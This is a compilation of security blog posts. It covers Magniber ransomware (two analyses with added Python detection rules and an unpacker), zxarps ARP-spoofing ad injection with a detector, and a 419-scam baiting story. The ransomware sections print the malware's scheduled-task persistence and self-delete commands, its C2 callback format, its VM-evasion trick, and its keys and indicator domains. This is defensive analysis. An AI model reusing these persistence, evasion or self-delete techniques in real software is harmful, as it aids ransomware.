Magniber Ransomware Wants to Infect Only the Right People


Exploit kit (EK) use has been on the decline since late 2016;
however, certain activity remains consistent. The Magnitude Exploit
Kit is one such example that continues to affect users, particularly
in the APAC region.

In Figure 1, which is based on FireEye Dynamic Threat Intelligence
(DTI) data shared in March 2017, we can see the regions affected by
Magnitude EK activity during the last three months of 2016 and the
first three months of 2017.

Figure 1: Magnitude EK distribution as
seen in March 2017

This trend continued until late September 2017, when we saw
Magnitude EK focus primarily on the APAC region, with a large share of
its activity targeting South Korea. Magnitude EK activity then fell off
the radar until Oct. 15, 2017, when it returned and began focusing
solely on South Korea. Previously it had been distributing Cerber
ransomware, but Cerber distribution has declined (we have also seen a
decline in Cerber distributed via email), and it is now distributing
ransomware known as Magniber.


The first reappearance of Magnitude EK on Oct. 15 came as a
malvertising redirection from the domain: fastprofit[.]loan. The
infection chain is shown in Figure 2.

Figure 2: Infection chain

The Magnitude EK landing page contained an exploit for CVE-2016-0189,
which FireEye first reported being used in Neutrino Exploit Kit after
the vulnerability was patched. Figure 3 shows the landing page and the
CVE in use.

Figure 3: Magnitude EK landing page

As seen previously with Magnitude EK, the payload is downloaded as a
plain EXE (see Figure 4), and the domain infrastructure is hosted on a
server presenting the following banner:

“Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6”

Figure 4: Magnitude payload header and
plain MZ response


In the initial report published by our colleagues at Trend Micro, the
ransomware being distributed is referred to as Magniber. These
ransomware payloads appear to target only Korean systems: they will not
execute if the system language is not Korean.

Magniber encrypts user data using AES-128. The sample used
(dc2a2b84da359881b9df1ec31d03c715) for this analysis was pulled from
our DTI system while the campaign was active. Of note, this sample
differs from the hash shared publicly by Trend Micro, but the two
exhibit the same behavior, share the infection vector, and were
distributed around the same time.

The malware carries a binary payload in its resource section that is
RC4-encrypted in reverse: unpacking starts from the end of the buffer
and walks back to its start. The reverse-RC4 decryption key is 30
bytes long and contains non-ASCII bytes. For this sample it is:

  • dc2a2b84da359881b9df1ec31d03c715 RC4 key:
    • { 0x6b,
      0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06, 0xb0,
      0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83, 0x04,
      0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f }

The malware calls GetSystemDefaultUILanguage and exits if the
system UI language is not Korean (the instructions can be seen in
Figure 5). After unpacking the payload in memory, the malware
transfers execution to it.

Figure 5: Language check targeted at Korea

A mutex named “ihsdj” is created to prevent multiple
executions. The payload then generates a pseudorandom 19-character
string from the CPU tick counter via multiple GetTickCount calls.
The string is used to name a file in the user’s %TEMP%
directory (e.g. “xxxxxxxxxxxxxxxxxxx.ihsdj”) that holds
the IV (initialization vector) for the AES-128 encryption; a copy of
the malware itself is also written there as “ihsdj.exe”.

Next, the malware constructs four callback URLs from the 19-character
pseudorandom string it generated and the following domains:


To evade sandboxes, the malware checks whether it is running inside a
VM and appends the result to the callback URL. It does this by
executing CPUID instructions sandwiched between RDTSC reads (shown in
Figure 6): under a hypervisor CPUID forces a VM exit (it is an
unconditionally intercepted instruction on VT-x), so it takes far
longer than on bare metal.

Figure 6: CPUID instruction to detect VM presence

The check is repeated several times to obtain the average execution
time of CPUID in TSC ticks; if the average exceeds 1000, the system is
considered a VM. In that case a “1” is appended to the end
of the URL (see Figure 7); otherwise a “0” is appended. The
format of the URL is as follows:

  • http://[19 character pseudorandom string].[callback
    domain]/new[0 or 1]

Examples of this would be:

  • http://7o12813k90oggw10277.bankme[.]date/new1
  • http://4bg8l9095z0287fm1j5.bankme[.]date/new0

Figure 7: Command and control communication

If the malware is executed a second time after encryption, the
callback path ends in “end0” or “end1” instead of
“new0” or “new1”. An example of this would be:

  • hxxp://j2a3y50mi0a487230v1.bankme[.]date/end1

The malware then starts to encrypt user files on the system,
renaming them by appending a “.ihsdj” extension. AES is a
symmetric cipher, so there is no public key involved; the hardcoded
AES-128 key and IV for the sample analyzed are:

  • IV: EP866p5M93wDS513
  • AES-128 key: S25943n9Gt099y4K

A text file “READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt”
is created in the user’s %TEMP% directory and shown to the user. The
ransom message is shown in Figure 8.

Figure 8: Ransom message for the infected user

The malware also adds scheduled tasks that run its copy from %TEMP%
through the Program Compatibility Assistant (pcalua.exe, a signed
Windows binary that launches whatever program is passed to -a) and
that load the ransom note, as follows:

  • schtasks /create /SC MINUTE /MO 15 /tn ihsdj /TR
    “pcalua.exe -a %TEMP%\ihsdj.exe”
  • schtasks /create /SC
    MINUTE /MO 15 /tn xxxxxxxxxxxxxxxxxxx /TR

The malware then issues a command to delete itself after exiting,
using a local ping as a delay before the deletion:

  • cmd /c ping localhost -n 3 > nul & del
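The two command lines above (a scheduled task whose action is proxied through pcalua.exe into %TEMP%, and a ping-then-del self-delete) are cheap to hunt for in process-creation telemetry. The Python below is an added detection example, not code from the FireEye post: it runs two regex rules over constructed process-creation events (invented here, shaped like the quoted commands with %TEMP% expanded to an assumed user profile path) and rates a pcalua task higher when its target lives in a temp directory.

```python
import re

# Constructed process-creation events (invented for this example, modelled on
# Sysmon Event ID 1 fields).  The first two are shaped like the commands the
# article quotes, with %TEMP% expanded to an assumed user profile path.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /SC MINUTE /MO 15 /tn ihsdj /TR "pcalua.exe -a C:\Users\victim\AppData\Local\Temp\ihsdj.exe"'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c ping localhost -n 3 > nul & del C:\Users\victim\AppData\Local\Temp\ihsdj.exe"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /SC DAILY /tn NightlyBackup /TR "C:\Program Files\Backup\backup.exe"'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c ping 10.0.0.1 -n 3"},
]

# Rule 1: schtasks creating a task whose action is proxied through pcalua.exe
# (the Program Compatibility Assistant).  Legitimate tasks almost never do
# this; the proxy hides the real binary from naive task-action inspection.
RE_PCALUA_TASK = re.compile(
    r"schtasks(?:\.exe)?\b.*?/create\b.*?pcalua\.exe\s+-a\s+(\S+)", re.I)
# Rule 2: ping used as a sleep before deleting a file (self-delete pattern).
RE_PING_DEL = re.compile(r"\bping\b[^&]*-n\s+\d+[^&]*&\s*del\b", re.I)
# A task action living in a temp directory raises the severity of rule 1.
RE_TEMP = re.compile(r"%TEMP%|\\Temp\\", re.I)


def classify(cmdline):
    """Return [(rule_name, severity), ...] for one command line."""
    hits = []
    m = RE_PCALUA_TASK.search(cmdline)
    if m:
        target = m.group(1).strip('"')
        hits.append(("schtasks_pcalua_proxy",
                     "high" if RE_TEMP.search(target) else "medium"))
    if RE_PING_DEL.search(cmdline):
        hits.append(("ping_delay_self_delete", "medium"))
    return hits


def scan(events):
    """Run both rules over a list of events; one row per hit."""
    rows = []
    for ev in events:
        for rule, sev in classify(ev["cmdline"]):
            rows.append({"rule": rule, "severity": sev,
                         "image": ev["image"], "cmdline": ev["cmdline"]})
    return rows


if __name__ == "__main__":
    for row in scan(SAMPLE_EVENTS):
        print(f'[{row["severity"]}] {row["rule"]}: {row["cmdline"]}')
```

Neither rule is Magniber-specific: pcalua.exe as a task action and ping-as-sleep before del are generic living-off-the-land patterns, so expect a small amount of benign noise from admin scripts and tune on the target path rather than on the task name.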

Figure 9 contains the Python code for unpacking the malware payload,
which is encrypted using RC4 in reverse.

Figure 9: Python script for unpacking
malware payload
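The unpacking script itself does not survive on this page, so the following is an added example written for this edit, not FireEye's Figure 9 code. It implements what the text describes: RC4 with the 30-byte key listed above, applied to the resource blob read from its last byte to its first. Assumptions: the decrypted bytes come out in natural PE order (the text does not say), and the resource blob has already been carved out of the dropper (for instance with pefile, not shown). The PE skeleton and the packed blob used at the bottom are constructed test fixtures, not sample data.

```python
# Added example: reverse-RC4 unpacker for the Magniber resource payload.
# The 30-byte key is the one the article lists for sample
# dc2a2b84da359881b9df1ec31d03c715.
RC4_KEY = bytes([
    0x6b, 0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06,
    0xb0, 0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83,
    0x04, 0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f,
])


def rc4_keystream(key):
    """Standard RC4: key-scheduling, then the PRGA yielding one byte at a time."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key, data):
    """RC4 is its own inverse: the same call encrypts and decrypts."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def unpack_reversed_rc4(resource, key=RC4_KEY):
    """'Encrypted in reverse': the article says unpacking walks the buffer from
    its last byte to its first, i.e. the RC4 keystream lines up with the
    reversed blob.  Assumption: the result is then in natural PE order."""
    return rc4(key, resource[::-1])


def looks_like_pe(data):
    """Cheap sanity check on the result: MZ header and e_lfanew -> 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# --- constructed test fixture, not a real sample -----------------------------
def build_fake_pe():
    """Minimal MZ/PE skeleton, just enough for looks_like_pe() to accept it."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(hdr) + b"PE\0\0" + bytes(60)


def pack_for_test(pe, key=RC4_KEY):
    """Inverse of unpack_reversed_rc4(): encrypt, then store the bytes reversed."""
    return rc4(key, pe)[::-1]


if __name__ == "__main__":
    blob = pack_for_test(build_fake_pe())
    out = unpack_reversed_rc4(blob)
    print("unpacked blob looks like a PE:", looks_like_pe(out))
```

If a real resource does not yield an MZ header under this assumption, the other reading of "in reverse" (the output itself still reversed) is one byte-flip away: check `looks_like_pe(out[::-1])` before concluding the key is wrong.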


Ransomware is a significant threat to enterprises. While the current
threat landscape suggests a large portion of attacks arrive by email,
exploit kits continue to put users at risk, especially those running
old software versions without ad blockers. Enterprises need to make
sure their endpoints are fully patched.


Malware Sample Hash
  • dc2a2b84da359881b9df1ec31d03c715 (decryption key shared)
Malvertiser Domains
  • fastprofit[.]loan
  • fastprofit[.]me
EK Domain Examples
  • 3e37i982wb90j.fileice[.]services
  • a3co5a8iab2x24g90.helpraw[.]schule
  • 2i1f3aadm8k.putback[.]space
Command and Control Domains

Go to Source
Author: Muhammad Umair

ARP Spoofing Used to Insert Malicious Adverts

Recently we came across a new variant of the malware ServStart. ServStart is primarily used by attackers located in China, in a mix of targeted and opportunistic attacks. The attackers are hosting the ServStart malware on a file server that is open for anyone to view.

The open file server at http://222.186.11[.]182:9999

The Rar Archive

One of the files on the server, 11.rar, contains this batch script:

The file 哈迪斯技术组ARP工具(Hades Technology Group ARP Tools).bat

Zxarps – An ARP Spoofing Tool

This batch script executes a tool known as zxarps. Zxarps is an ARP spoofing tool that has been publicly available for over ten years.

It’s a fairly unusual tool, though familiar to anyone who played with hacking tools like Cain and Abel decades ago. ARP spoofing can be used to redirect traffic to an attacker controlled server.

A description of ARP spoofing, from Wikipedia

A report from 2014 on an attack involving CVE-2014-6332 describes well how an attacker might use zxarps:

“This malware performs ARP spoofing on the network to cause other systems to route their traffic through the infected system, and inject a malicious IFRAME into webpages.”

The ARP spoofing attack can work in both directions. If a web-host is compromised, zxarps can be used to insert malicious code into other sites on the same web-host. A report from way back in 2009 describes attacks that operated this way:

“A server on a local subnet was compromised and the attacker installed ARP spoofing malware (together with keyloggers and other Trojans) on the machine. The ARP spoofing malware poisoned local subnet so the outgoing traffic was tunneled through it. The same malware then inserted malicious JavaScript into every HTML page served by any server on that subnet. You can see how this is fruitful for the attacker – with one compromised server they can effectively attack hundreds of web sites (if it’s a hoster indeed).”

We can see in the batch file that zxarps is attempting to insert Javascript from the URL http://www.mei988[.]com/yy.js.
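The two quoted reports describe the same observable: one host on the subnet answering ARP for addresses that are not its own, so that traffic to the gateway (or to the other web servers) flows through it. As an added example that is not part of the AlienVault post, the Python below parses raw Ethernet/ARP reply frames and flags two signs of zxarps-style poisoning: an IP whose MAC binding changes from the one first learned, and a single MAC claiming several IPs. The frames are constructed in the script itself (the MAC and IP values are invented), not captured traffic.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def _mac(s):
    return bytes.fromhex(s.replace(":", ""))


def _ip(s):
    return bytes(int(p) for p in s.split("."))


def _mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def _ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet header + 28-byte ARP reply; used only to build test frames."""
    eth = _mac(target_mac) + _mac(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += _mac(sender_mac) + _ip(sender_ip) + _mac(target_mac) + _ip(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet II frame, or None if not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op,
            "sha": _mac_str(frame[22:28]), "spa": _ip_str(frame[28:32]),
            "tha": _mac_str(frame[32:38]), "tpa": _ip_str(frame[38:42])}


class ArpWatch:
    """Tracks IP->MAC bindings learned from ARP replies and raises alerts.

    The first binding seen for an IP is trusted and never overwritten, so a
    poisoner that shows up after the real host is caught; a poisoner that
    speaks first is not (seed `bindings` from a known-good table in practice).
    """

    def __init__(self, many_ips_threshold=3):
        self.bindings = {}          # ip -> first MAC seen
        self.ips_by_mac = {}        # mac -> set of IPs it has claimed
        self.threshold = many_ips_threshold
        self.flagged = set()

    def feed(self, frame):
        pkt = parse_arp(frame)
        if pkt is None or pkt["op"] != ARP_REPLY:
            return []
        ip, mac = pkt["spa"], pkt["sha"]
        alerts = []
        known = self.bindings.get(ip)
        if known is None:
            self.bindings[ip] = mac
        elif known != mac:
            alerts.append(("ip_mac_conflict", ip, known, mac))
        claimed = self.ips_by_mac.setdefault(mac, set())
        claimed.add(ip)
        # A host answering for many addresses is the subnet-wide poisoning
        # zxarps performs (a router doing proxy ARP is the benign exception).
        if len(claimed) >= self.threshold and mac not in self.flagged:
            self.flagged.add(mac)
            alerts.append(("mac_claims_many_ips", mac, len(claimed)))
        return alerts

    def feed_all(self, frames):
        return [a for f in frames for a in self.feed(f)]


# Constructed frames: a legitimate gateway reply, then an attacker claiming the
# gateway's IP and two other hosts' IPs.  All addresses are invented.
GATEWAY_MAC = "00:11:22:33:44:01"
VICTIM_MAC = "00:11:22:33:44:10"
ATTACKER_MAC = "de:ad:be:ef:00:01"
SAMPLE_FRAMES = [
    build_arp_reply(GATEWAY_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.10"),
    build_arp_reply(ATTACKER_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.10"),
    build_arp_reply(ATTACKER_MAC, "192.168.1.10", GATEWAY_MAC, "192.168.1.1"),
    build_arp_reply(ATTACKER_MAC, "192.168.1.11", GATEWAY_MAC, "192.168.1.1"),
]

if __name__ == "__main__":
    for alert in ArpWatch().feed_all(SAMPLE_FRAMES):
        print(alert)
```

On a real network feed this the frames from a promiscuous capture (or a span port) and seed `bindings` from the switch's MAC table; the conflict rule alone is what arpwatch-style tools have done for years, and the many-IPs rule is what distinguishes a single spoofed gateway from a host trying to sit in front of the whole subnet.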

Potentially infected sites

A quick Google for the malicious Javascript indicates a number of websites serving the malicious code. This may mean the attackers are running zxarps on their network.

All this.. Just to insert adverts for a Casino

Reviewing the injected code indicates it isn’t being used to serve malware, but simply to serve adverts for a Chinese casino:

If you’re reviewing malvertising on a website, and aren’t sure how it got there, this is another technique to consider.

Indicators of Compromise

Malicious files on the fileserver

You can view these indicators in AlienVault OTX


Go to Source

419 scammer offers USD $60 million—and a free child

Scammers often come crawling out of the woodwork in all sorts of places you wouldn’t necessarily expect. This is to their advantage when trying to keep suspicion in check; after all, we’re pretty much pre-programmed to think 419 scams will only wander into our inboxes.

Twitter, though? That’s a little different. Oh, and this scammer also wants me to adopt his pretend son in return for 60 million USD, just to keep things firmly in the land of “this can’t be happening.”

Our tale begins with a Twitter DM (direct message) from a sock-puppet account designed to look like a member of the armed forces. This is a common 419 social media tactic during times of natural disaster, as potential victims may be more inclined to believe the fake account really is part of a relief effort—and could you send that $100 via wire transfer a little faster, please?

Our fake army general here isn’t interested in natural disasters; he begins outreach with a quoted message from the Pope, and a request to send a mail about something important:

Important discourse

I fired off a missive and received a reply a few days later from a second email account:

Welcome my dear, I received your letter and well understood by me, Due
to my present condition i am not available to care for my Son, and i
don’t want him to grow up in my family home, Now am facing medical
treatments which i never know if i will get feet from it, I want you
to take good care of my Son , in this case i directed you to receive
the sum of $60 Million usd from Africa development bank of Togo, so
that as soon as the funds entered into your account my Son will join
you. 13 years old boy. dearest I want you to keep this within you to
protect the project.

I will give you full contact information of the bank where the funds
deposited so that you will contact them and have to transfer the funds
to your account.

Provide me your personal details address and i code of your id card,
as i received it i will forward it to the bank and instruct to conduct
the funds to your account.

Best regards I expecting urgent reply as possible as you receive the message.

Yes, they really are offering to send me a 13-year-old. Hopefully not one of those really grumpy ones.

Now, this is pretty unusual as far as 419 scams go, so I had to dig into it a little more. Wasting the time of 419 scammers while waiting for email providers to shut down accounts is a valuable exercise, as every second spent with your own missives is more time spent keeping them away from actual victims. You have to be a little creative though, or they just won’t reply. Years of baiting has meant scammers are quite cautious these days, and anything “sensible looking” seems to send them running for the hills.

With that in mind:

anyone for quidditch?

I’m sorry.

Anyway, baiting a 419 scammer is a bit cat and mouse—you need to keep them interested by pretending to sound like you may conceivably fall for their ridiculous scam, but push it too far and they may realise they’re having their time wasted. As it happens, this guy was surprisingly enthusiastic about the noble sport of Quidditch and replied almost instantly:

A fine sport

Sorry kid, you’re in goal. Do they have goalies in Quidditch? I have no idea. Imagine being given a broomstick but then being made to sit still in front of a flaming hoop or whatever. The point is, I’m going to score a cool 60 million dollars and a 13-year-old Quidditch prodigy. I’m about to become very wealthy, by which I mean, I’m about to become a money mule.

Now the game is afoot. It’s time to confuse things further by making it sound like I think I’m supposed to be sending him the 60 million. Also: #teamsnape or #teamdumbledore?

Snape or Dumbledore?

At the time I’m not sure if the above blows my not particularly stealthy cover, but a little under 24 hours later, it’s a faintly terse “get on with it” response complete with fake legal contact, and also a planting of the flag for Team Snape:

Team Snape

Actually, it’s more like “Yeah yeah whatever, Professor Snape, sure. Show me the money,” but we’re still wasting valuable scammer cycles. When they get a case of the snappy replies, there’s only one thing to do— ignore them for a while. Three days later he’s back and sounding a bit worried. Can’t have the cash boat sailing off into the distance!

Of course, I only went missing because I was busy doing a great job of redesigning the bedroom for my soon-to-be Quidditch superstar. Honest:

Train time

I thought he might have Googled Hogwarts Express here, but my luck holds out:

Transportation trouble

I left him hanging a little while longer. At this point, I’m not entirely sure who is doing the trolling:


To date, most of the accounts in use by “Mark” have been shut down and/or reported for spam, so it’s time to ease off on the Potter gas pedal and slowly cut him out of my life. I’m sorry, Mark: Your kids will never raise the Grand Wizard Cup in, uh, Quidditchbowl 2020 no matter how much you plead.


Tempting, but no. 419 scams are bad and you could get into legal trouble for becoming tangled up in one. Ignore, report, and delete.

Even when it sounds as cool as this:


The post 419 scammer offers USD $60 million—and a free child appeared first on Malwarebytes Labs.

Go to Source
Author: Christopher Boyd

Magniber ransomware: exclusively for South Koreans

The Magnitude exploit kit has been pretty consistent over the last few months, dropping the same payload—namely, the Cerber ransomware—and targeting a few select countries in Asia. Strangely, Magnitude EK disappeared in late September, and for a while we wondered whether this was yet another casualty in the already deflated exploit kit scene.

However, a few days ago Magnitude EK resurfaced, this time with a new payload. The delivered malware is also a ransomware, but of a family that was not known before. It has been named Magniber.

This Magniber ransomware is highly targeted, as it checks at several levels (external IP, the language installed, etc.) to ensure that the attacked system is only South Korean. Targeting a single country is unusual on its own, but performing multiple checks to be sure of the country and language of origin makes this a first for ransomware.

Analyzed samples

Older sample

Distribution method

So far, we found this ransomware is dropped only by the Magnitude exploit kit:

No other distribution method is known at the moment.

Behavioral analysis

If the malware is executed on non-Korean systems, the only thing we can see is the operation of deleting itself, delayed by running the ping command:

It only starts its malicious operations on systems with Korean language detected. The executable is pretty noisy, because it implements various tasks just by command line. Running it on the sandbox, we can see the following graph of calls:

The malware copies itself in %TEMP% and deploys itself with the help of task scheduler:

In the same folder, we can see also the ransom note and yet another file. Its name is the same as the part of the domain that has been generated for the particular user, and its extension is the same as the extension of the encrypted files:

To each encrypted file is added an extension that is composed of small Latin characters and is constant for the particular sample of Magniber.

The same plaintext produces the same ciphertext. This means every file is encrypted with exactly the same key and IV.

Below, we demonstrate a visualization of bytes of a sample BMP file before and after being encrypted by Magniber:

As you can see, there are no visible patterns in the encrypted version; it suggests that some strong algorithm has been used, probably AES in CBC mode.

At the beginning of each encrypted file, we find a 16-character long identifier that is constant for the particular sample of Magniber:

After the encryption of all the found files is done, the ransomware runs notepad, displaying the dropped ransom note:

The ransom note is in the TXT format and its structure is minimalistic. It gives four alternative addresses pointing to the page for the victim.

Page for the victims

The page for the victims is in English only. Its template is very similar to the one used by the Cerber ransomware (this is the only similarity between those ransomware families—internally they are quite different):

Network communication

We found Magniber connecting domains that are generated by the built-in algorithm. The same domains that are used as CnC are later used for individual websites for the victim (only they are called with a different parameter). Examples of the called URLs:

Compare the URLs from the ransom note with the corresponding run:

At the beginning of the execution, the ransomware sends a request to the URL ending with new1 (or new0). At the end of the execution, it requests end1 (or end0). The meaning of those URLs will be explained in detail in the next part of the article.

What’s interesting is that the server gives a valid response if, and only if, the public IP of the victim was Korean. Otherwise, the response is empty. Example of the captured initial request and response (the request was made from the Korean IP):

In the response, we get a 16-character long, random string: ce2KPIak3cl6JKm6. The new random URL can be requested only once. If we try to repeat the request, we will get an empty response.

The other request (the ending one) also gives a 16-character long, random string in response. But contrary to the first one, it responds on every request (a different random string each time). Example of the ending request and response:

Inside the code

As always, to understand what is really going on here, we will have to take a deeper dive inside the code.

Magniber is delivered packed by various crypters, and the unpacking method will depend on the crypter’s features. You can see the process of unpacking the current sample in the video below.

After defeating the first layer, we obtain the second PE file: the malicious core. The core does not contain any advanced obfuscation. The authors made the strings just slightly difficult to follow by loading them into memory character by character:

Execution flow

Looking inside the unpacked payload, we can clearly see why it doesn’t run on most systems. At the beginning, there is a language check (using the API function GetSystemDefaultUILanguage):

The only accepted UI language is Korean (code 1042). In case of any other detected, the sample just deletes itself and causes no harm. This language check has been added in the recent Magniber samples and was not found in the earlier versions, such as aa8f077a5feeb9fa9dcffd3c69724c942d5ce173519c1c9df838804c9444bd30.

After the check is passed, Magniber follows with a typical ransomware functionality. Overview of the performed steps:

  1. Creates mutex
  2. Checks in the temp folder if the marker file has been dropped
  3. Drops the copy of itself in %TEMP% and adds the scheduled task
  4. Queries the generated subdomains to retrieve the AES key (if retrieving the key failed, loads the hardcoded one)
  5. Enumerates and encrypts files with the selected extensions
  6. Reports finishing the task to the CnC
  7. Executes the notepad displaying the ransom note
  8. Deletes itself

What is attacked?

The list of extensions attacked by Magniber is really long. It includes documents, source code files, and many others. The complete list is below:

docx xls xlsx ppt pptx pst ost msg em vsd vsdx csv rtf 123 wks wk1 pdf dwg 
onetoc2 snt docb docm dot dotm dotx xlsm xlsb xlw xlt xlm xlc xltx xltm pptm 
pot pps ppsm ppsx ppam potx potm edb hwp 602 sxi sti sldx sldm vdi vmx gpg 
aes raw cgm nef psd ai svg djvu sh class jar java rb asp php jsp brd sch dch 
dip vb vbs ps1 js asm pas cpp cs suo sln ldf mdf ibd myi myd frm odb dbf db 
mdb accdb sq sqlitedb sqlite3 asc lay6 lay mm sxm otg odg uop std sxd otp 
odp wb2 slk dif stc sxc ots ods 3dm max 3ds uot stw sxw ott odt pem p12 csr 
crt key pfx der 1cd cd arw jpe eq adp odm dbc frx db2 dbs pds pdt dt cf cfu 
mx epf kdbx erf vrp grs geo st pff mft efd rib ma lwo lws m3d mb obj x3d c4d 
fbx dgn 4db 4d 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr 
cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx dd df1 dmo dnc 
dp1 dqy dsk dsn dta dtsx dx eco ecx emd fcd fic fid fi fm5 fo fp3 fp4 fp5 
fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt 
mrg mud mwb s3m ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 
p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq 
sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb 
zdc cdr cdr3 abw act aim ans apt ase aty awp awt aww bad bbs bdp bdr bean 
bna boc btd cnm crw cyi dca dgs diz dne docz dsv dvi dx eio eit emlx epp err 
etf etx euc faq fb2 fb fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt 
fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hz idx ii ipf jis joe jp1 jrtf
kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man 
map mbox me mel min mnt mwp nfo njx now nzb ocr odo of oft ort p7s pfs pjt prt 
psw pu pvj pvm pwi pwr qd rad rft ris rng rpt rst rt rtd rtx run rzk rzn saf 
sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa sty sub sxg tab 
tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof upd utf8 utxt vct vnt 
vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wp wps wpt wpw wri wsc wsd wsh wtx
xd xlf xps xwp xy3 xyp xyw ybk ym zabw zw abm afx agif agp aic albm apd apm 
apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 ca cals can cd5 cdc 
cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv dm3 
dmi vue dpx wire drz dt2 dtw dv ecw eip exr fa fax fpos fpx g3 gcdp gfb gfie 
ggr gih gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx 
itc2 iwi j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jw 
jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs my ncr nct 
nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cmx cnv csy 
cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf 
fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg
 gem glox hpg hpg hp idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx 
mmat mat ovp ovr pcs pfv plt vrm pobj psid rd scv sk1 sk2 ssk stn svf svgz 
tlc tne ufr vbr vec vm vsdm vstm stm vstx wpg vsm xar ya orf ota oti ozb 
ozj ozt pa pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 
pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg 
ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli
 rpf rri rs rsb rsr rw2 rw s2mv sci sep sfc sfw skm sld sob spa spe sph spj 
spp sr2 srw wallet jpeg jpg vmdk arc paq bz2 tbk bak tar tgz gz 7z rar zip 
backup iso vcd bmp png gif tif tiff m4u m3u mid wma flv 3g2 mkv 3gp mp4 mov
avi asf mpeg vob mpg wmv fla swf wav mp3 

The list loads at the beginning of the file encrypting function:

As usual, some of the directories are exempted:

:\documents and settings\all users
:\documents and settings\default user
:\documents and settings\localservice
:\documents and settings\networkservice
local settings
public\music\sample music
public\pictures\sample pictures
public\videos\sample videos
tor browser
program files (x86)
program files
system volume information

How does the encryption work?

Magniber encrypts files with AES 128 bit in CBC mode. It is implemented with the help of Windows Crypto API.

The DGA and the victim ID

In the usual scenario, the malware tries to retrieve the AES key from the CnC by querying pseudo-random subdomains:

The pseudo-random part is used to uniquely identify the victim. It is generated by the following simple algorithm:

Each character is based on the tick count, converted to the given charset:

The number 0 or 1 is appended to the URL depending if the sample is running under the debugger or not (detected using time check).

Four domains are being queried for the key:

If any of them give a 16-byte long response, that means the valid key is copied to the buffer and used further. Otherwise, it falls back to the hardcoded key.

The default AES key and IV

The interesting thing is that each sample comes with the AES key hardcoded. However, it is used only as a backup if downloading the key from the CnC was for some reason impossible (that occurs also in the case if the public IP was not from Korea). The key is unique per each sample. In the currently analyzed sample, it is S25943n9Gt099y4K:

Similarly, the initialization vector is always hardcoded in the sample (but not downloaded). The same 16-character long string was also saved at the file beginning. In the currently analyzed sample it is EP866p5M93wDS513:

The algorithm

